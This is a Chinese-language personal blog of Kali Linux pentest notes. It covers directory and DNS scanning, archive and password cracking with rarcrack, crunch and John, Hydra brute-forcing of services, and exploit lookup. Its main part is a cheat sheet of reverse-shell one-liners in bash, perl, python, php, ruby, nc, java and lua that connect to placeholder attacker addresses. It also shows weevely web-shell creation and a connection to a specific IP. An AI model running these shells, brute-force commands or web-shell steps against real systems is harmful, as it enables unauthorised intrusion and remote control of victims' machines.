Kali_自我修养(持续更新)

不适合人类阅读,非常水的自我笔记

Posted by Eli0t on 2020-02-14

Catalog

1.开机配置
2.各种工具使用

开机配置

Kali 2020.1版本安装报错、中文乱码问题、恢复可视化界面,如何解决

https://blog.csdn.net/weixin_42453837/article/details/104477091?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

各种工具使用

扫瞄网站目录 dirb

dirb https://baidu.com

DNS 扫描

1
2
3
dnsenum
dnsrecon
dnsmap

爆破压缩包 rarcrack

rarcrack 文件名 —threads 线程数 —type rar|zip|7z

生成字典工具

生成字典crunch 27 27 -t flag{12345678909876543%%%%} > 1.txt

john 破解工具

全称叫“John the Ripper password cracker(约翰开膛手密码破解)”。
John the Ripper是一个快速的密码破解程序,目前可用于Unix,Windows,DOS和OpenVMS的许多口味。其主要目的是检测弱Unix密码。除了在各种Unix系统上最常见的几种crypt(3)密码哈希类型之外,现在支持的还有Windows LM哈希,以及社区增强版本中的大量其他哈希和密码。
john 破解系统密码(windows和kali)
使用John破解zip压缩包的密码
爆破工具John XXXXX —wordlist-1.txt —users-flag

Hydra 爆破 Web 登录、数据库、SSH、FTP等服务

hydra -L username.txt -P password.txt -v mysql://目标IP:mysql端口号

kali 本地漏洞库:/usr/share/exploitdb/

/usr/share/exploitdb/
查找漏洞:
searchsploit ms17-010

漏洞扫描 nikto 文档说明https://cirt.net/nikto2-docs/

nikto -h http:192.168.1.1

Fsociety Hacking Tools Pack-一款专业的渗透测试框架

https://www.freebuf.com/column/159210.html

介绍视频:fsociety Hacking Tools Pack - Mr. Robot Penetration Testing Framework

各种反弹 shell

  1. 利用 exec 弹
    1
    2
    $ exec 5<> /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
    $ cat <&5 | while read line; do $line 2>&5 >&5; done
  2. 利用 bash 弹
    1
    2
    在目标机器上执行
    bash -i >& /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
  3. 利用 perl 弹
    1
    perl -e 'use Socket;$i="your-fuxking-public-ip";$p=your-fuxking-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  4. 利用 python 弹
    1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your-fuxking-public-ip",your-fuxking-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  5. 利用 php 弹
    1
    php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  6. 利用 ruby 弹
    1
    ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  7. 利用 nc 弹
    1
    2
    3
    nc -e /bin/sh 10.0.0.1 1234
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
    nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
  8. 利用 java 弹
    1
    2
    3
    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()
  9. 利用 lua 弹(Lua 是一种轻量小巧的脚本语言,用标准C语言编写并以源代码形式开放)
    1
    lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

kali 自带反弹 shell
find / -name php-reverse-shell.php
修改好ip和port就可以用了。

内置 UA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
安卓QQ内置浏览器UA:

Mozilla/5.0 (Linux; Android 5.0; SM-N9100 Build/LRX21V) > AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 > Chrome/37.0.0.0 Mobile Safari/537.36 V1_AND_SQ_5.3.1_196_YYB_D > QQ/5.3.1.2335 NetType/WIFI

安卓微信内置浏览器UA:

Mozilla/5.0 (Linux; Android 5.0; SM-N9100 Build/LRX21V) > AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 > Chrome/37.0.0.0 Mobile Safari/537.36 > MicroMessenger/6.0.2.56_r958800.520 NetType/WIFI

IOSQQ内置浏览器UA:

Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) > AppleWebKit/537.51.2 (KHTML, like Gecko) Mobile/11D257 > QQ/5.2.1.302 NetType/WIFI Mem/28

IOS微信内置浏览器UA:

Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) > AppleWebKit/537.51.2 (KHTML, like Gecko) Mobile/11D257 > MicroMessenger/6.0.1 NetType/WIFI

kali 菜刀🔪

weevely generate /root/shell.php flag创建一句话
weevely http://45.112.45.5/shell.php flag连接一句话